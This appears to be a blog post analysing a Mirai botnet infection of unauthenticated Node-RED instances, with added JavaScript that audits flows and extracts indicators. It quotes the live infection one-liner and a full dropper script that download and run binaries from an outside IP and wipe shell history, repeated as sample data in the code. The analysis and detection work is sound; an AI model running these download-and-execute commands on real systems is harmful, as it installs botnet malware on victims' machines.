Mirai Botnet is targeting unauthenticated Node-Red instances

Ala Bouali
6 min read · Nov 26, 2023
[Image: a Node-RED instance infected with Mirai via the “exec” function]

What is “Node-Red”?

“Node-RED is a programming tool for wiring together hardware devices, APIs and online services in new and interesting ways.

It provides a browser-based editor that makes it easy to wire together flows using the wide range of nodes in the palette that can be deployed to its runtime in a single-click.” — source: https://nodered.org/

How did I find this?

I use Shodan to find new and interesting things, like vulnerable devices, so I can inspect their malware. Today I was interested in finding instances of “Node-Red” running online that require no authentication. To my surprise, I found a couple of them quickly. So I inspected them to see if I could find anything there.. aaaand I was right!

[Image: the infection vector: the “exec” function]

How did the infection occur?

The red box that you see in the screenshot is the call to the “exec” function in “Node-Red”, which executes system commands on the device:

echo a;cd /tmp || cd /dev/shm || cd ~ ; wget --no-check-certificate http://84.54.51.48/ntpd.sh ; curl -k http://84.54.51.48/ntpd.sh -O ; sh ntpd.sh nodered ; rm ntpd.sh;echo a

Let’s break this down to understand what happened:

echo a

Simply prints “a” to the console.

cd /tmp || cd /dev/shm || cd ~

This command tries to change the current directory. It uses the || operator to execute the next command only if the previous one fails. It attempts to change to the /tmp directory first, then to /dev/shm, and finally to the user's home directory (~).

wget --no-check-certificate http://84.54.51.48/ntpd.sh

If the previous cd command was successful, this command uses wget to download a script (ntpd.sh) from the specified URL (http://84.54.51.48/ntpd.sh). The --no-check-certificate flag is used to skip SSL certificate checks.

curl -k http://84.54.51.48/ntpd.sh -O

Alternatively, if wget is not available, this command attempts to download the same script using curl. The -k flag is used to allow connections to SSL sites without certificates, and the -O flag is used to save the downloaded file with the same name as in the URL.

sh ntpd.sh nodered

This command executes the downloaded script (ntpd.sh) with the argument nodered. The script likely performs some installation or configuration related to Node-RED.

rm ntpd.sh

After the script has been executed, this command removes the downloaded script (ntpd.sh) from the system.

So basically, the infection goes like this:

1- download the “malware dropper” from: http://84.54.51.48/ntpd.sh

2- run the dropper.

3- delete the dropper from the system after executing it.

That seems simple but effective!
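As an added defender-side example (not code from the original post or from the Node-RED project), here is a small audit script that reads a Node-RED flow export and flags “exec” nodes whose command has the shape broken down above: a cd chain into a temporary directory, a wget/curl fetch from a bare IP, certificate checks turned off, a downloaded .sh file passed to a shell, and a cleanup rm. The flows and field layout in the block are constructed; the first exec command is the one from the screenshot, the second is a benign one for contrast.

```javascript
// Added example (not code from the original post or from the Node-RED
// project): audit a Node-RED flow export (the JSON array stored in
// flows.json) for "exec" nodes whose command looks like the download-and-run
// one-liner shown above. The flows below are constructed; the first exec
// command is the one from the post's screenshot, the second is benign.
// Field layout follows the shape of a Node-RED export but is constructed here.

const SAMPLE_FLOWS = [
  { id: "t1", type: "tab", label: "Flow 1" },
  { id: "i1", type: "inject", z: "t1", name: "", once: true, wires: [["e1"]] },
  {
    id: "e1", type: "exec", z: "t1", name: "",
    command:
      "echo a;cd /tmp || cd /dev/shm || cd ~ ; wget --no-check-certificate " +
      "http://84.54.51.48/ntpd.sh ; curl -k http://84.54.51.48/ntpd.sh -O ; " +
      "sh ntpd.sh nodered ; rm ntpd.sh;echo a",
  },
  { id: "e2", type: "exec", z: "t1", name: "disk check", command: "df -h /" },
];

// Each indicator is a predicate over the command string. A single hit is
// weak evidence; the dropper pattern trips most of them at once.
const INDICATORS = {
  // "cd A || cd B" chain into a world-writable or in-memory directory
  tmpDirChain: (c) =>
    /\bcd\s+\/(tmp|dev\/shm|var\/run|mnt)\b/.test(c) && /\|\|\s*cd\b/.test(c),
  // wget or curl pulling from a bare IPv4 address instead of a hostname
  downloadFromIp: (c) =>
    /\b(wget|curl)\b[^;|&]*https?:\/\/\d{1,3}(\.\d{1,3}){3}\//.test(c),
  // certificate verification switched off (moot for plain http, but telling)
  tlsDisabled: (c) => /--no-check-certificate|\bcurl\b[^;|&]*\s-k\b/.test(c),
  // a just-downloaded .sh file handed straight to a shell
  runsFetchedScript: (c) => /\b(sh|bash)\s+[\w./-]+\.sh\b/.test(c),
  // the command removes its own artifact afterwards
  deletesArtifact: (c) => /\brm\s+(-\w+\s+)?[\w./-]+\.sh\b/.test(c),
};

// Return every exec node in a flow export.
function findExecNodes(flows) {
  return flows.filter((n) => n && n.type === "exec");
}

// Which indicators fire for one command, and a verdict (3 or more hits).
function assessCommand(command) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k](command));
  return { hits, suspicious: hits.length >= 3 };
}

// One report entry per exec node in the export.
function auditFlows(flows) {
  return findExecNodes(flows).map((n) => ({
    id: n.id,
    name: n.name || "(unnamed)",
    ...assessCommand(n.command || ""),
  }));
}

// Stand-alone run over the constructed sample; for a real instance, pass
// JSON.parse(fs.readFileSync("flows.json", "utf8")) to auditFlows instead.
for (const entry of auditFlows(SAMPLE_FLOWS)) {
  const tag = entry.suspicious ? "SUSPICIOUS" : "ok";
  console.log(`${tag.padEnd(10)} ${entry.id} ${entry.name} [${entry.hits.join(", ")}]`);
}
```

Three or more indicators mark a node as suspicious; tune the threshold against your own flows. Note that --no-check-certificate and curl -k do nothing for a plain http:// URL, so their presence says more about copy-pasted tooling than about transport security. Scanning is a detective control: the preventive fix for the exposure this post is about is to require login on the editor and admin API through the adminAuth setting in Node-RED's settings.js (credentials type, with passwords stored as bcrypt hashes generated by node-red admin hash-pw).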

What is the content of the dropper?

When I downloaded the file from that URL, I got this shell script:

#!/bin/sh
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.x86 || curl -O http://84.54.51.48/ntpd.x86; cat ./ntpd.x86 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.x86
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm5 || curl -O http://84.54.51.48/ntpd.arm5; cat ./ntpd.arm5 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm5
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm6 || curl -O http://84.54.51.48/ntpd.arm6; cat ./ntpd.arm6 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm6
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm || curl -O http://84.54.51.48/ntpd.arm; cat ./ntpd.arm > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm7 || curl -O http://84.54.51.48/ntpd.arm7; cat ./ntpd.arm7 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm7
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.mips || curl -O http://84.54.51.48/ntpd.mips; cat ./ntpd.mips > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.mips
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.mipsel || curl -O http://84.54.51.48/ntpd.mipsel; cat ./ntpd.mipsel > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.mipsel
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.sh4 || curl -O http://84.54.51.48/ntpd.sh4; cat ./ntpd.sh4 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.sh4
# cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.i686 || curl -O http://84.54.51.48/ntpd.i686; cat ./ntpd.i686 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.i686
# cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.i586 || curl -O http://84.54.51.48/ntpd.i586; cat ./ntpd.i586 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.i586
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.m68k || curl -O http://84.54.51.48/ntpd.m68k; cat ./ntpd.m68k > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.m68k
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.spc || curl -O http://84.54.51.48/ntpd.spc; cat ./ntpd.spc > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.spc
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.ppc || curl -O http://84.54.51.48/ntpd.ppc; cat ./ntpd.ppc > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.ppc
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arc || curl -O http://84.54.51.48/ntpd.arc; cat ./ntpd.arc > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arc
rm -rf ntpd.sh ~/.*HIST* ~/.*hist*

Each line does exactly what the infection command above does, but each line results in a download and execution attempt of a different binary file. So the attacker here is attempting to download all the available compiled versions of the malware and execute them one by one, so he can save the time of figuring out what the correct architecture is and which version to download exactly. Lazy.. but still effective apparently! The result is that one of them will eventually be executed and the machine becomes infected and joins the botnet!
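To turn a dropper like this into indicators of compromise, here is an added example (not code from the original post) that parses the script line by line and reports the download host(s), which architecture-specific payloads are active versus commented out, whether each line executes what it fetched, and whether the script wipes shell history. The script text embedded in the block is an abridged, constructed copy of the dropper above (three active lines, one commented-out line and the final rm line); the parser does not depend on the “ntpd” name or on the host.

```javascript
// Added example (not code from the original post): extract indicators from a
// multi-architecture dropper like the one above. DROPPER_EXCERPT is a
// constructed, abridged copy of that script; the parser is generic.

const DROPPER_EXCERPT = `#!/bin/sh
cd /dev/shm || cd /tmp || cd ~ || cd /; wget http://84.54.51.48/ntpd.x86 || curl -O http://84.54.51.48/ntpd.x86; cat ./ntpd.x86 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.x86
cd /dev/shm || cd /tmp || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm7 || curl -O http://84.54.51.48/ntpd.arm7; cat ./ntpd.arm7 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm7
# cd /dev/shm || cd /tmp || cd ~ || cd /; wget http://84.54.51.48/ntpd.i686 || curl -O http://84.54.51.48/ntpd.i686; cat ./ntpd.i686 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.i686
cd /dev/shm || cd /tmp || cd ~ || cd /; wget http://84.54.51.48/ntpd.mips || curl -O http://84.54.51.48/ntpd.mips; cat ./ntpd.mips > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.mips
rm -rf ntpd.sh ~/.*HIST* ~/.*hist*
`;

// Parse one line of the dropper into its indicators.
function parseDropperLine(line, lineNo) {
  // a leading "#" disables the line; "#!" is the shebang, not a comment
  const commented = /^\s*#/.test(line) && !/^#!/.test(line);
  const body = line.replace(/^\s*#\s*/, "");
  const urls = body.match(/https?:\/\/[^\s;|'"]+/g) || [];
  const payload = urls.length ? urls[0].split("/").pop() : null;
  // architecture is whatever follows the last dot of the payload name
  const arch = payload && payload.includes(".")
    ? payload.slice(payload.lastIndexOf(".") + 1)
    : null;
  const hosts = [...new Set(urls.map((u) => new URL(u).hostname))];
  // runs the fetched file with the script's own argument, e.g. "./ntpd $1"
  const executes = /;\s*\.\/\S+\s+\$\d/.test(body);
  // "rm -rf ... ~/.*HIST*" style anti-forensics
  const wipesHistory = /\brm\s+-\w*\s[^\n]*hist/i.test(body);
  return { lineNo, commented, urls, payload, arch, hosts, executes, wipesHistory };
}

// Parse every non-empty line, keeping the original 1-based line numbers.
function parseDropper(text) {
  return text
    .split("\n")
    .map((line, i) => ({ line, lineNo: i + 1 }))
    .filter((x) => x.line.trim() !== "")
    .map((x) => parseDropperLine(x.line, x.lineNo));
}

// Collapse the per-line records into an IoC summary.
function summarizeDropper(text) {
  const entries = parseDropper(text);
  return {
    activeArches: entries.filter((e) => e.arch && !e.commented).map((e) => e.arch),
    disabledArches: entries.filter((e) => e.arch && e.commented).map((e) => e.arch),
    hosts: [...new Set(entries.flatMap((e) => e.hosts))],
    // disabled lines still reveal the download host and paths, so keep them
    urls: [...new Set(entries.flatMap((e) => e.urls))],
    wipesShellHistory: entries.some((e) => e.wipesHistory),
  };
}

// Stand-alone run over the constructed excerpt.
console.log(JSON.stringify(summarizeDropper(DROPPER_EXCERPT), null, 2));
```

The commented-out i686/i586 lines still carry the host and file paths, so they stay in the IoC list; the per-line commented flag only records that they would not run. A hunting rule built from this output would watch for outbound HTTP to the listed host together with execution of a freshly written file from /dev/shm or /tmp, and for shell-history files being deleted.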

I’ve downloaded one of the files and then uploaded it to VirusTotal and this was the result:

https://www.virustotal.com/gui/file/92868ddf19cdd8cf12e2dd2f730284312d6ff90a14ad635110d83ea12bab124f/detection

[Image: VirusTotal scan result]

I didn’t want to bother myself with reverse engineering it since that probably has already been done by other people, but I did extract the C&C server’s IP address: “214.194.12.158”

[Image: C&C server’s IP address]

I hope you enjoyed my article! See you the next time.


Ala Bouali

I am a dedicated self-taught programmer and ethical hacker with a proven track record in developing and maintaining advanced hacking tools and conducting pentests.